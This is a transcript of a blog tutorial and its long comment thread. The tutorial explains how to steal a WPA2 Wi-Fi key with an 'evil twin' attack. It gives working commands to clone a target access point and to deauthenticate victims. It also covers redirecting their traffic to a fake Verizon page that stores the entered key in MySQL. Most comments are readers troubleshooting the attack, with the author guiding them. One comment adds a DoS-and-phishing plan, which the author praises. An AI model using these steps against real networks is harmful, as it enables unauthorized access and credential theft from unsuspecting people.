Hacking Wpa 2 Evil Twin Method

While that technique works, it could take an awful long time, especially when brute forcing. On this technique, named ‘Evil Twin’, we take a different perspective to the attack. Using a powerful long range wireless card (Alfa AWUS036NH), we clone the target network to confuse our victim. Then, we deauthenticate the victim from his own wireless network and wait until he connects to our access point – which looks exactly like his. When the victim connects, he is redirected to a service page asking for the WPA-2 key in order to access the internet. As soon as we get the key, you can either allow the victim to use the network (maybe improvise some password sniffing?) or just bring it down manually. For this example I created a service page based on Verizon ISP. The files are placed at the default location (/var/www/). I created a database called ‘wpa2′, which can be done with the following commands: Login to MySQL: mysql -u root -p Note : Default backtrack user/pass are root/toor Create the database: create database wpa2; use wpa2; create table content(key1 VARCHAR(64), key2 VARCHAR(64));


how to hack wirless routers

Transcript of Hacking Wpa 2 Evil Twin Method

Page 1: Hacking Wpa 2 Evil Twin Method

While that technique works, it could take an awful long time, especially when brute



On this technique, named ‘Evil Twin’, we take a different perspective to the attack.

Using a powerful long range wireless card (Alfa AWUS036NH), we clone the target

network to confuse our victim. Then, we deauthenticate the victim from his own

wireless network and wait until he connects to our access point – which looks exactly

like his.


When the victim connects, he is redirected to a service page asking for the WPA-2

key in order to access the internet. As soon as we get the key, you can either allow

the victim to use the network (maybe improvise some password sniffing?) or just

bring it down manually.


For this example I created a service page based on Verizon ISP. The files are placed

at the default location (/var/www/). I created a database called ‘wpa2′, which can be

done with the following commands:


Login to MySQL:

mysql -u root -p

Note: Default backtrack user/pass are root/toor

Create the database:

create database wpa2;

use wpa2;

create table content(key1 VARCHAR(64), key2 VARCHAR(64));


Finally, start apache and mysql services and check everything works, by going typing

localhost on a web-browser.



Page 2: Hacking Wpa 2 Evil Twin Method

Install dhcp3 and create config file:

apt-get install dhcp3-server -y

mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup

gedit /etc/dhcp3/dhcpd.conf


ddns-update-style ad-hoc;

default-lease-time 600;

max-lease-time 7200;

subnet netmask {

option subnet-mask;

option broadcast-address;

option routers;

option domain-name-servers;



Start clone access point:

airmon-ng start wlan0 [channel]

airbase-ng -e "AP name" -c [channel] mon0

ifconfig at0 up

ifconfig at0 netmask

route add -net netmask gw

dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0

/etc/init.d/dhcp3-server start

Flush iptables:

iptables --flush

iptables --table nat --flush

iptables --delete-chain

iptables --table nat --delete-chain

iptables --table nat --append POSTROUTING --out-interface [internet connection]


iptables --append FORWARD --in-interface at0 -j ACCEPT

echo 1 > /proc/sys/net/ipv4/ip_forward

Redirect traffic:

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination [IP


iptables -t nat -A POSTROUTING -j MASQUERADE

DeAuthenticate Access Point (poor):

aireplay-ng -0 0 -a [target bssid] [monitor interface]

Page 3: Hacking Wpa 2 Evil Twin Method

DeAuthenticate Client (recommended):

aireplay-ng -0 0 -a [target bssid] -c [client mac] [monitor interface]



John (280 days)

Very professional video.

Would you consider uploading the index.html/php for us to modify? Or make a

tutorial on the code behind the service page?


admin (280 days)

Hey John!

Thanks for the feedback. The post has been updated with the download link and

instructions. Hope it helps.

Take care.


sickee (280 days)

Hi! For your Hacking WPA 2 Key – Evil Twin Method (No Bruteforce) where did you

exactly place your template and is it ok if you could upload your example template.

Currently I am trying to implement the same method with airsnarf and I am having

serious issues with the dhcp on backtrack. Please help dude!


admin (280 days)

Page 4: Hacking Wpa 2 Evil Twin Method

Hey sickee!

I uploaded the post and added the download link. The files can be copied and

pasted on to the /var/www/ folder. Once that’s done, start Apache and MySQL from

the services menu, and go type localhost to test it in a web browser.

Let me know how it goes, or contact me in IRC (freenode.net). Nick: deathcorps

Take care


otlin (271 days)

Good day, we tried:

root@bt:~# mysql -u root -p

Enter password:

Welcome to the MySQL monitor. Commands end with ; or \g.

Your MySQL connection id is 34

Server version: 5.1.41-3ubuntu12.10 (Ubuntu)

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

after we tried to create table contents as below:

mysql> create table content(key1 VARCHAR(64), key2 VARCHAR(64));

and after appear this

ERROR 1046 (3D000): No database selected.

Could you explaine there are my mistakes.

Take care


admin (271 days)

Page 5: Hacking Wpa 2 Evil Twin Method

Hey otlin, the article has been updated. There were too commands prior to that

missing, which were:

create database wpa2;

use wpa2;

and finally:

create table content(key1 VARCHAR(64), key2 VARCHAR(64));

Try that out and it should work.

Thanks for the feedback!


darkey (270 days)

Hello sir

im a new user in Backtrack I would like to know if there is any way to crack a WPA2

without using Dictionarys?

i got handshake cable modem (HITRON) key lenth 12 chracters exp ( 40I3WQ893RCO

) and i cracked the capfile but passphrase not in the dictionary please help me

i need 12 chracters exp ( 40I3WQ893RCO ) password list or how to crack this cap file

esyly please help me.. i am waiting the replay pease please..


admin (270 days)

I’m not understanding you completely..

This technique in the video DOESN’T use a dictionary.

But if you have the cap file, then you HAVE to use either a dictionary, or a brute-


I ran into this the other day, which has many wordlists:



Page 6: Hacking Wpa 2 Evil Twin Method

otlin (270 days)

Good day,

thank for your prompt reply. I checked as you told and it worked. However I tried to

start your page as localhost on a web-browser, but it doesn’t work. I had put all files

from folder “verison” to folder “www”. Apache and MySQL had been started before

working with web-browser, but I could see only this

“It works!

This is the default web page for this server.

The web server software is running but no content has been added, yet.”.

And I have one more question, I am beginner in working with LINUX, and I ask, if

possible to create “BASH script” for automatic entering all commands which were

given by you. Please advise.

Take care


admin (270 days)

Well, you extracted the folder too.

The files have to be exactly at /var/www/

Not at /var/www/verizon/

It is possible for me to make the bash script, however, this script would change

from version to version, so it would be too time consuming.

I much rather invest that time on learning new techniques =)

Why don’t you take the initiative?


otlin (270 days)

Hi, sorry again.

I extracted exactly at /var/www/ several times, but the result the same,

Page 7: Hacking Wpa 2 Evil Twin Method

“It works!

This is the default web page for this server.

The web server software is running but no content has been added, yet.”.

All the best


admin (270 days)

Hey Otlin!

Try copying all the files inside of /var/www/verizon/ to the directory /var/www/ …

you should replace the index.html already there with the one from my template.

You pasted the files inside of the verizon folder, where they should just be in the


Hope it helps


michel (270 days)

sorry for Inconvenience

I’m again

i wach your vedio more then 5 times your idea is very great

I’m not a pro hack or a programer im IT admin and i use a backtrack as a reguler

user.. i have an idea if you can help me because you are more profisional than me in

100 times ..

my idea is why we don’t use your step but in deferent way

let we clone the WAP for vectimes by macking a simelar WAP in same name and

same range after we monitore and got the information about the victime


then we must denil of service of vectim WAP and then force users to connect to our

fak WAP??? here is the puzzel

we must find tool or create a tool that will work togather with our access point to

retrive all the trafic from our access point to our database (mysql ,wpa2) or by

captiring the trafic inside our access point.

Page 8: Hacking Wpa 2 Evil Twin Method

more explination (sorry my english not to strong):

as exampel

{we must kill the vectime WAP by sending 1000 of trafic to busy it from responding

to client and force the client to check his WAP . the client will note that there are two

access point with the same name, one of them with rear signal another with fulll

signal (our fak access point)}

1-our access point must also be secured with a key

2- client vectim must point to our wap and he will click connect

3- our access point will aske him to insert the wpa2 key

4- our access point will redirect key to our backtrack database

{ here we must find a way to capture all the trafic inside our fack WAP and to force it

redirect to the database or to capture what the victim client type for the key.

sorry again for Inconvenience and many thanks

awaiting your responce teacher


admin (270 days)

Hey Michel!

You don’t need to explain any further my friend!

That was actually my original idea… however, I ran into trouble at the last step. I

couldn’t find a way to retrieve the victim’s association key, since he isn’t

associated yet.

The victim only gets an IP after being associated, so that makes our webserver

(apache) useless.

So the problem is we need a router that can either trick the user into thinking it’s a

WPA2 network or that simply records the keys.

I’m also not sure if just sniffing the network would lead us in finding the key…

If you have something to add or any other ideas, I’m really interested in hearing


Take care


otlin (269 days)

Page 9: Hacking Wpa 2 Evil Twin Method

Good day again,

Thanks a lot for your advice, I’ve already started the localhost page , but could you

tell me from where or how you get the IP address which you input in

firefox after the command “iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –

to-destination [IP address:80]”.

Take care.


admin (265 days)

Hey Otlin!

The IP address is my own internal IP, which I use as a webserver running apache.

After you start apache you should be able to access the website by typing your IP

address in the url of a browser.

To find your IP type: ifconfig


darkey (265 days)

root@bt:~# mysql -u root -p

Enter password:

Welcome to the MySQL monitor. Commands end with ; or \g.

Your MySQL connection id is 34

Server version: 5.1.41-3ubuntu12.10 (Ubuntu)


‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

mysql> use wpa2;

ERROR 1049 (42000): Unknown database ‘wpa2′




why this error message come to my display can u explain to me please????

Page 10: Hacking Wpa 2 Evil Twin Method


admin (265 days)

You have to create the database first.

As the comment below mentions:


first of all you have to create your database using :

Login to MySQL:

mysql -u root -p

Note: Default backtrack user/pass are root/toor

Create the database:

create database wpa2;

use wpa2;

create table content(key1 VARCHAR(64), key2 VARCHAR(64));


Vpoint7 (247 days)

You do have some point here, evil twin considered an old time method, but pretty

much might work anyway. I’ll give this a try, and might ask u later for any doubts.


Unknown (265 days)


first of all you have to create your database using :

Login to MySQL:

mysql -u root -p

Note: Default backtrack user/pass are root/toor

Create the database:

create database wpa2;

Page 11: Hacking Wpa 2 Evil Twin Method

use wpa2;

create table content(key1 VARCHAR(64), key2 VARCHAR(64));

but my question for admin is:

i’m facing problems in watching video,how would i check the table to see

passwords ?


admin (265 days)


My suggestion is, as soon as you see a client has connected to the cloned network

(you can see this in the terminal where you brought the network up), stop


Then to check the table you have to log in to mysql.

Then: use wpa2;

Then: SELECT * FROM content;

Assuming you created the table with the commands I gave out and the client

entered the password, you should see the entries.

If you would like to test this, go to your browser after starting apache and try to

input a password and see if it saves it.

Take care :]


darkey (263 days)


sorry for the disturb how to create the database????

do u have any video about create the database ???

please help me

Page 12: Hacking Wpa 2 Evil Twin Method


darkey (263 days)

root@bt:~# mysql -u root -p

Enter password:

Welcome to the MySQL monitor.

Commands end with ; or \g.

Your MySQL connection id is 35

Server version: 5.1.41-3ubuntu12.10 (Ubuntu)


‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

mysql> use wpa2;

Reading table information for completion of table and column names

You can turn off

this feature to get a quicker startup with -A

Database changed

mysql> select * from content;

Empty set (0.00 sec)


sorry for the disturb how to create the database????

do u have any video about create the database ???

please help me


admin (263 days)


You have successfully created the database. However , you’re database is still

empty. That means nobody entered a pass at the service page.

Page 13: Hacking Wpa 2 Evil Twin Method

You can see this from the line: “Empty set (0.00 sec)”

Try accessing your page and enter a value yourself to make sure it works properly!


darkey (262 days)

lot of thanks admin


Try accessing your page and enter a value yourself to make sure it works properly!


hoew to do accessing my page????


admin (256 days)


To find your IP, open a terminal and type: ifconfig

Now, assuming you started apache & mysql, type your ip in a web browser, or just

locahost .

If you have placed the “Service page” in the correct directory you should see the

page, otherwise you will see the apache page saying “It works!”.

Hope it helps


T!G3R (257 days)

Hello Admin,

First of all I want to thank you for this great video.

Secondly, I hope that you explain me this step :

gedit /etc/dhcp3/dhcpd.conf

Page 14: Hacking Wpa 2 Evil Twin Method


ddns-update-style ad-hoc;

default-lease-time 600;

max-lease-time 7200;

subnet netmask {

option subnet-mask;

option broadcast-address;

option routers;

option domain-name-servers;



I want to know if I should copy and past all this lines without any changes or I need to

change some IP adress.

Finally, thank you in advance.

Bye Bye


admin (257 days)

Hey T!G3R!

You should copy everything starting at the line: ddns…

If you look at the lines you will see this is a network model.

It tells you the range of internal IP’s to use, allocated addresses, etc.

In my house I use the range:

Because of that, I decided to use the range for this.

Notice that if your home network uses the same range, it can cause confusion with

your devices.

If you would like to know more, google Subnetting.

Thanks for the feedback =)


Rafael (152 days)

Hello, I love your work congratulations.

Page 15: Hacking Wpa 2 Evil Twin Method

Only a doubt, my local ip is

I use the same settings that you use the video?

Since the machine’s IP is BT5


spartacratus (256 days)

hi !!!

great tuto . i’ve a problem .i’ll do all steps and the fake webpage appears , and i want

to try it so i put password and after i start mysql

root@bt:~# mysql -u root -p

Enter password:

Welcome to the MySQL monitor.

Commands end with ; or \g.

Your MySQL connection id is 35

Server version: 5.1.41-3ubuntu12.10 (Ubuntu)


‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

mysql> use wpa2;

Reading table information for completion of table and column names

You can turn off

this feature to get a quicker startup with -A

Database changed

mysql> select * from content;

Empty set (0.00 sec)


i type the password but in nothin appears plz help me

i’m algerian sorry my english is not strong

help me teacher

Page 16: Hacking Wpa 2 Evil Twin Method


admin (256 days)

Hey @Spartacratus !

So you’re saying you see the service page, type the password but it doesn’t send it

to the mysql database?

After you type the password you should get a message saying “Saving Settings”,

just like in the video.

If you’re still getting Empty set on mysql, that means it’s not saving the password.

Why don’t you send me a screenshot of what’s going on to my email, and I can

further help you.

[email protected]


spartacratus (255 days)



redpen (254 days)

hello admin,

I followed all the steps and entered all the commands. I have created the database

and downloaded the template and placed the files in the var/www folder. I installed

the dhcp server and copied the setting in the new config file. I started the fake clone

access point and flushed the tables and redirected the traffic. When I tried to access

the fake web page from my own machine it worked. I were able to connect to the

fake access point from the test target client machine. However when I tried to access

the fake web page from the test target client machine I got web page can not be find

as when you are not connected to internet.


Page 17: Hacking Wpa 2 Evil Twin Method

Rehan (254 days)

This command doesn’t work to me

dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0


sparta (253 days)

hi !!!

i’m kamel from algeria i want to know how can i connect to a hidden network


1- the ssid of the network isnt hidden it is “gaamex-direction”

2-when i tape airodump-ng mon0 this network appears and it is unsecured

3- but when i go to windows xp and i scan the networks i dont find it so i click on

hidden essid and i tape “gaamex-direction” but a window pop up said “”the network

exist “” but i cant conect

4-in backtrack wicdnetwoork manager i cant find it

can u help me how can i connect to it ?


Jack (251 days)

hey , thanks admin , but i have only one question ..

when i open my browser to check the page status ..http:ipaddress and then inter ,

this what page say “It works!

This is the default web page for this server.

The web server software is running but no content has been added, yet.

Page 18: Hacking Wpa 2 Evil Twin Method

and we must type “http:ipaddress/index.html to check it

now what will happen when the victiom open my page will he get ‘http://ipaddress ”

only or he will get ‘ipaddress/index ??? pls reply


admin (245 days)

You have placed the website in the wrong place.

The files should DIRECTLY at:


Meaning that the index.html should be:


I’m assuming you can access the files by typing:


Have you included the folder as well?

Just paste the files, not the folder.


Dohn Joe (245 days)

Looks like the Evil Twin Method(TM) will have to be shelved for a while. Check out the

latest WPS vulnerability on Dan Kaminsky’s blog:



admin (245 days)

As much as I would love to agree, this isn’t true.

I have tried version 1.0 with bad results. Turns out one of the biggest providers in

US (verizon) uses routers deactivated WPS by default.

Furthermore, large enterprise networks will never have WPS enabled, which makes

evil twin method perfect for the scenario.

Page 19: Hacking Wpa 2 Evil Twin Method

Besides that, I really liked the concept of reaver and am looking forward to try it

again! Just waiting for a stable release.

Hopefully a stable version will come out before the router manufacturers patch an

update to disable WPS by default.


darkness (241 days)

ddns-update-style ad-hoc;

default-lease-time 600;

max-lease-time 7200;

subnet netmask {

option subnet-mask;

option broadcast-address;

option routers;

option domain-name-servers;



what do you specify in accordance with this section?


admin (234 days)

This will create the specifications for the network.

For example, the last line says range … that means

we are going to have a max. of 10 clients able to connect to this network. If you

wanted to allow 20, you would change the 140 to 150.

All the lines are self-explanatory if you have some knowledge in networking! =)


John (241 days)

Page 20: Hacking Wpa 2 Evil Twin Method

Very nice technique. It’s probably very common for basic users to enter WPA2 key in

the prompt but is it also a default Verizon AP authentication method? It’s probable a

more tech savvy user will expect to see the AP-login password as most after market

routers do when you try to login. The problem is, how to know the router password? I

have an idea and I’ll throw you a ball:

1. DoS the target AP -> wait for it to disappear on airodump (use quick refresh

option), (user resets his device, most common way to do fault diagnostics), spoof

your client MAC and connect to the AP. Login and recon info: site appearance, AP

model, IP’s, etc. Works rather well because in many cases the routers default wireless

is open and up by default.

2. Rebuild the entire router configuration site to look identical and make the WPA2

setup page connect to MySQL.

3. DoS once more -> When victim resets his AP, put up evil twin server with almost

identical MAC-addr. (If airbase could just ignore the deauth packets sent to it’s MAC-

addr. you could even use the same one.)

4. User expects his router to pop up in windows with it’s default values and makes a

mistake and connects and configures the evil twin (could even affect airbase-

settings). The set WPA2 password is recorded and settings take effect immediately. If

the target MAC is behind the same NAT not even the external IP will appear different,

user can’t tell who it is connecting to. The key is collected. Suddenly, the problem

reoccurs (attacker DoS’s his airbase), the router crashes. User makes another reset

and this time it seems to work (what was the matter with it?)

5. Attacker hopes user will configure the same password for his own AP and many

times he does because It’s less complicated than setting a new passphrase for all

wireless devices.


admin (226 days)

Oh boy, this sounds insanely ingenious!

Just how I like it!

Any chance you can send this to my email at [email protected] ?

If you could specify the purpose on each step also, that would be awesome… I’m

looking into developing a part two of this tutorial.

Page 21: Hacking Wpa 2 Evil Twin Method

Even though we have Reaver now (if you noticed, my video came out slightly

before reaver was publicly released), I’m sure all the hackers like to have an extra

card up their sleeve.

Take care John!


sergio (239 days)

lot of thanks admin for the video

but i have a problem…

root@bt:~# ifconfig at0 up

root@bt:~# ifconfig at0 netmask

root@bt:~# route add -net netmask gw

root@bt:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid


Internet Systems Consortium DHCP Server V3.1.3

Copyright 2004-2009 Internet Systems Consortium.

All rights reserved.

For info, please visit https://www.isc.org/software/dhcp/

/etc/dhcp3/dhcpd.conf line 10: semicolon expected.



/etc/dhcp3/dhcpd.conf line 10: unexpected end of file



Configuration file errors encountered — exiting


*i have installed the dhcp3-server but i don’t find him in /var/run/

can u help me?


Page 22: Hacking Wpa 2 Evil Twin Method

Boody (232 days)

hi, so when you enter this : ddns-update-style ad-hoc;

default-lease-time 600;

max-lease-time 7200;

subnet netmask {

option subnet-mask;

option broadcast-address;

option routers;

option domain-name-servers;



you get the error i got that too, just add a semi-column to the end of the line:

range; <<like this

and it will work, good luck


Bad Biddy (231 days)

I get this same error. Have you figured it out?


admin (231 days)

Yes, sorry about that!

It was a typo on my fault, I missed a semi-colon at line 10, like the error says.

You can just insert a semi-colon (;) at line 10 or copy and paste from the website

into the dhcpd.conf file since it is now updated.

This is the line in question, it was like this:


Should be like this:


Thank you!

Page 23: Hacking Wpa 2 Evil Twin Method


kira (235 days)


question ;

for the :

subnet netmask {

it’s general or must change it ?

because IPs on my network are like ….

thank you


admin (231 days)

Is the subnet mask on your network ?

If it is, then yes.

The only thing you can’t have is two IP’s on the same subnet.

Suppose your IP was and you tried to create this network, then you

would have a problem.


Bad Biddy (232 days)

Im getting this error code for some reason

root@bt:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid


Internet Systems Consortium DHCP Server V3.1.3

Copyright 2004-2009 Internet Systems Consortium.

All rights reserved.

Page 24: Hacking Wpa 2 Evil Twin Method

For info, please visit https://www.isc.org/software/dhcp/

/etc/dhcp3/dhcpd.conf line 10: semicolon expected.



/etc/dhcp3/dhcpd.conf line 10: unexpected end of file


Configuration file errors encountered — exiting


admin (231 days)

Yes, sorry about that!!!

It was a typo on my fault, I missed a semi-colon at line 10, like the error says.

You can just insert a semi-colon (;) at line 10 or copy and paste from the website

into the dhcpd.conf file since it is now updated.

This is the line in question, it was like this:


Should be like this:


Thank you!


Boody (232 days)

Hi Admin,

First of all, i would like to thank you alot for this great video!! then, i have a question,

everything went great and working, but when i connect with my other laptop to the

cloned network i get connection but limited or no connectivity so when i try to visit

any website it doesnt redirect me to verizon page, it just gives me server not found,

is there a solution for this?

And one more question what is that that you posted at the bottom of the page where

Page 25: Hacking Wpa 2 Evil Twin Method

to use it “You may use these HTML tags and attributes:


admin (231 days)

Hey Boody!

What we are trying to do is bridge the connection in Linux, so you are connected to

internet in let’s say wlan0 interface you want to bridge it to at0, as you can see in

this line of code:

iptables –table nat –append POSTROUTING –out-interface [internet connection] -j


The out-interface should be where you’re connected to the internet, in my case I

used two wireless cards, so I used the wlan interface. If you were connected on

eth0 for example, you would type eth0 in there.

I usually use my Android phone to create a hotspot and share that connection…

Oh, and the “You may use these HTML tags…” is for the comments on the website

and not part of the tutorial or commands section.

Hope I helped in some way and if you still have the problem, let me know. I’m

thinking of working on a forum due to the amount of questions, I know it gets hard

to even find my reply since there’s so many comments.

Take care boody


Blood (228 days)

Hi, i’ve a problem to redirect to verizon page by target laptop. Why? I have Broadcom

BCM4312 internal wifi card for run the attack. Is it work?

Page 26: Hacking Wpa 2 Evil Twin Method


admin (226 days)

Hey Blood!

What problem specifically are you having? I can’t tell if it works or not, but you can

always try it yourself!

Start up Backtrack, and once it loads, issue the command:


If you see a wireless interface (such as wlan0, etc.), it works!

Issue wicd and try connecting to the network properly.

Notice this isn’t the easiest of methods… some knowledge will come in handy for it.

Take care, and good luck!


DONZ (228 days)

hey. I have the verizon files in /var/www . the files are not in the verizon folder so im

wondering why i get the ‘It Works’ page still in the browser. any help?


admin (226 days)

Have you replaced the index.html file with the one in the verizon folder?

That is the file that is looked up whenever someone access the server.


George (227 days)

Page 27: Hacking Wpa 2 Evil Twin Method

Hi Admin!

I have a question.. First of all many thanks for this great video.. Well my problem is

that i makethe fake AP and i managed the connections fine, so when i connect to the

fake AP i can access the webpage that we created but the problem is that is taking

too much time, about 4 – 5 mins. Any help?


admin (226 days)

Hey George!

The issue seems to be the wireless card used to create the fake AP. Perhaps the

card itself isn’t “powerful”?

For the video and all my lab work, I use only Alfa wireless cards because they

provide great range and power — awus036nh to be specific.

Also, what is your internet connection from the ISP?

Here in the USA, I get around 10mb, which is plenty and loads up mosts pages

rather fast.

If you think there might be something wrong going on, and have some networking

experience, I recommend downloading “Wireshark” it let’s you analyze network


You might find that something else is happening with the packets, maybe their

being sent somewhere where their not supposed to be sent?

Give it a try and let us know!

Take care buddy!


doctorK (226 days)

Hi admin

tnk for the video..very nice!

Page 28: Hacking Wpa 2 Evil Twin Method

i’ve a problem..i can’t connect the client to the fake AP

i tried to set in the client “no encrypt” for the connection but is the same…

i don’t know i can i do

it’s also interesting the john’s post

can anybody make a video about that??



admin (226 days)

Hey buddy doctorK!

Do you see the fake access point broadcasting at least? Can you see it in your list

of wireless networks?

The network should be open, that means it has no encryption, so your actions

seem right. Does it have low signal by any chance?

Make sure to issue a ifconfig command and see if you have IP’s in different

subnets, because you can’t have two IP’s on the 192.168.2.* range.

Take care!


doctorK (226 days)

tnx for replay admin

yes i can see the fake AP whit the client but i can’t connect it

i’ve a good signal

what about ifconfig

i made everything that you sed in the tutorial



Page 29: Hacking Wpa 2 Evil Twin Method

Braun (225 days)

Hi admin, i have a problem with ip address. How you get the IP address which you input after the command “iptables -t nat -A PREROUTING -

p tcp –dport 80 -j DNAT –to-destination [IP address:80]”. How i get my ip address? I

don’t know!. Probably i have to configure the server apache. but how i do? Please,

help me. thank you


Braun (225 days)

How to configure /etc/apache2/httpd.conf and /etc/hosts ?


admin (209 days)

Hey Braun!

This is how it works:

We have two interfaces right, one is connected to the internet and the other one is

the wireless interface used to create the access point.

So let’s say you’re connected to the internet via cable (eth0). In that case you

issue the command ifconfig and look over there, you should see your IP address.

Starting apache is easy, already comes pre-installed in Backtrack.

Go to the menu:

Backtrack > Services > HTTP

Hope it helps!


Ali (225 days)

Page 30: Hacking Wpa 2 Evil Twin Method

Hey Bro , First of all i wanted to thank you for this Great mind you have , its really

smart method to use , which i liked too much and really thanks for sharing , but bro

i have one little problem which is really wierd , i DID everything perfectly and i got it

without any errors but when i try to connect to my new access point , which is

unsecured using another pc i cant connect to it , i get a “unable to connect to AP” ,

so what do you think the problem is is it from my Wireless device , iam not sure , i

have Atheros AR9170 which is supported with aircrack suite , but i saw in ur video u

use 2 interfaces while setting some options u used wlan0 and next time wlan2 , but i

only have one interface which i used in the two settings which is wlan0 , just watned

to mention that so u can help me , thank you sooo much again for sharing and

reading my problem



admin (209 days)

Hey Ali!

How’s it going?

The reason I use two interfaces is because after obtaining the key we can usually

make good use of the created access point to implement password sniffing and

such without need of arp poisoning.

Is there no other way you can use an interface for internet? I have a rooted android

that I create access point for internet. You can always use eth0 as well.

Take care


Wle.INC (221 days)

Hey man, great tut!

I too get “It works This is the default..”

I dunno why, I HAVE placed contents of Verizon folder to /var/www.

I have edited httpd.conf file (DirectoryIndex /var/www/index.html etc), but nothings

Page 31: Hacking Wpa 2 Evil Twin Method

seems to work.

Please help!

Best wishes,



admin (209 days)


Have you replaced the index.html at /var/www ?

I don’t understand why this is happening to be honest… have you accessed it from

your own browser?

Start apache then try opening firefox, type on the url localhost

See if you still get the “It works! …” even after replaced.

Take care


austin316 (209 days)

can you please tell me where this came from 00:12:23:34:45:56

if we don’t use -a option then the clone network will automatically use the MAC of the

interface that is on mon0

one more question ,what IP should i use , where exatly your’s came from?


admin (209 days)

Hey Austin!

You got it pretty much! If you don’t specify anything it uses the MAC address of the

monitor interface.

Page 32: Hacking Wpa 2 Evil Twin Method

The IP comes from wlan2, where I am connected to the internet via a rooted

Android used to create a hotspot, there I run apache.

Then I use interface wlan0 to issue the monitor interface, which I use to create the

access point.

Hope it helped! Take care.


austin316 (208 days)

thanks alot i appreiate it,

should i edit the /etc/dhcp3/dhcpd.conf: according to the wlan settings that i’m

connected to internet with?i mean subnet mask etc.

last question but not least

how to delete or remove a clone network?


admin (207 days)

The /etc/dhcp3/dhcpd.conf should actually be different than your wlan settings,

just copy and paste from article above.

Double check on your wlan interface just to make sure it doesn’t interfere with the subnet.

To delete the network you just bring airbase down. On the terminal where you

opened it, just hold ctrl and press c… and you won’t see it in wireless ap’s


Take care


anemos (205 days)

Page 33: Hacking Wpa 2 Evil Twin Method

well i got to the step i deauthenticated the AP ‘s client(that’s myself so to test) but

when i stop the attack in order to get connected again no ‘verizon site’ appears to

get the key…what am i missing?should it be a second device connected to get it

right?mysql & apache works fine..thanks!


lars (193 days)

Will this work if i try it on a WPA2-PSK protected network??


admin (187 days)

Yes! This is actually meant for WPA / WPA 2


Max (183 days)

iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination [IP


am in college wifi and i dont know what ip address to be entered please help.


admin (183 days)

That’s the IP address of the interface on your computer where you are connected.


ifconfig [interface]

In the video I used wlan2, so e.g. ifconfig wlan2

If you are connected, it will tell you the IP of that interface.


Page 34: Hacking Wpa 2 Evil Twin Method

redness (180 days)

Hi guys everything went smoothly exetp fot this part …plis assist

mysql> select * from content;

Empty set (0.00 sec)



johny (179 days)

This method is a TOTAL fake, like most of them cracking WPA – for example

dictionary attack.The little kids put their password in the first line on the dictionary

file and BOOM , WPA cracked in 1 sec. LMAO all the time.

Here is why this method will never work.The client has stored a profile connecting to

that WPA encrypted wi-fi network.IT IS ENCRYPTED.its is not a open network.SO

whenever the client tries to communicate with the AP all of its DATA packets will be

encrypted.So you are setting up EVIL TWIN that can not decode the encrypted data

packets of the client, because you do not know the WPA key.So the client will drop

the connection.

Practically client can only authenticate and associate with your evil twin AP.It will not

be able to communicate with it.

That method would work only if the AP has no encryption.Client will send DATA

packets unencrypted and it will be able to communicate with the AP – showing it up

the captive web page portal.


admin (177 days)

Hey John!

I do enjoy an argument, but you lack research on your comment… so no argument


Page 35: Hacking Wpa 2 Evil Twin Method

First, I would like to say that I posted this method on a few different forums, all of

which it got many comments and feedback from security enthusiasts.

For my surprise actually a lot of people said they had been using this method for a

while (seen on bt forums) and even contributed their own tips into it!

Now to simply explain the method to you: using airbase-ng we are capable of

deauthenticating the victim and have him connect back to our network instead of

his, thanks to the “Accept all probes” option. Of course, you will need decent gear

for this.

From there, we social engineer the victim (he thinks he is in his own network) by

redirecting to a page with the password, or perhaps a router update, etc.


R3V0LV3R (177 days)

i have a problem redirecting the traffic i dont get the verzion that

i downloaded it because when i try connecting with it it says limited access and i dont

get redirect to the apache server

btw how do i know the ip that i want to redirect the traffic to?

you just put na random number without telling us how you choose it?


WPA/WPA2 Hacking Tanpa Wordlist/Bruteforce « Red Devils Penetration

Testing (172 days)

[...] : http://technicdynamic.com/2011/12/hacking-wpa-2-key-evil-twin-no-bruteforce/

Share this:TwitterFacebookLike this:LikeBe the first to like this [...]


rico (168 days)

hello sir.

could you help me about this error?

root@bt:~# mysql -u root -p

Enter password:

Page 36: Hacking Wpa 2 Evil Twin Method

ERROR 2002 (HY000): Can’t connect to local MySQL server through socket

‘/var/run/mysqld/mysqld.sock’ (2)

thank you in advance.


cristy (158 days)

you have to start mysql service type in terminal this comand: /etc/init.d/mysql start

and hit enter after login in mysql with password: toor


NightCoder (155 days)

great… bro I hope you show us the same way on windows


matt (152 days)


Can anybody help me out, what should my config file look like if my default gate way

on my router is



admin (150 days)

You can use the same config in the command section!

Save it in the same location: /etc/dhcp3/dhcpd.conf

Good luck!


Page 37: Hacking Wpa 2 Evil Twin Method

Me (150 days)

Yeah, but why not take a weaker encryption algorithm like web or one of the many

many wpa2 variants (including wpa radius and wpa md5) as fake access point and let

the user enter their password the NORMAL WAY and crack the encrypted but weaker

encrypted than wpa2 aes password, that you will get back from the client when he

tries to enter his password the *normal* way.


admin (150 days)

I see what your saying and I like the idea… we could then use the many password

websites (md5decrypter, etc.) to query the hashes? Or would they still be salted?

I did improve this method a bit by using airbase instead of the manual config and

other details as the post is almost a year old.

But will take a look into creating the md5 access point.


arminaven (148 days)

hi !!

i was tried this methode one 30 days, but until now i unsucces, my problem is, when i

finished this methode, when victim klick my fake AP, cann’t acces, and then no result

, but when i type my IP ( at browser victim, the fake AP worked, n when

victym type the password, password stored on my database, this can run if the victim

type my IP, so i think my problem is in ddns-update-style ad-hoc;, information of my

IP is like this:


do i must modify the ddns-update-style ad-hoc; couse my ip

please help me

Page 38: Hacking Wpa 2 Evil Twin Method

sorry about my english

thank’s about your attention


admin (127 days)

Hey arminaven!

After many comments and suggestions (almost 100 comments only on this page!),

and a lot of people having issues, I decided to make a script to automate this…

I know I’m not answering your specific question and I’m sorry.

Hopefully it will help you understand it better once you see how the script works.

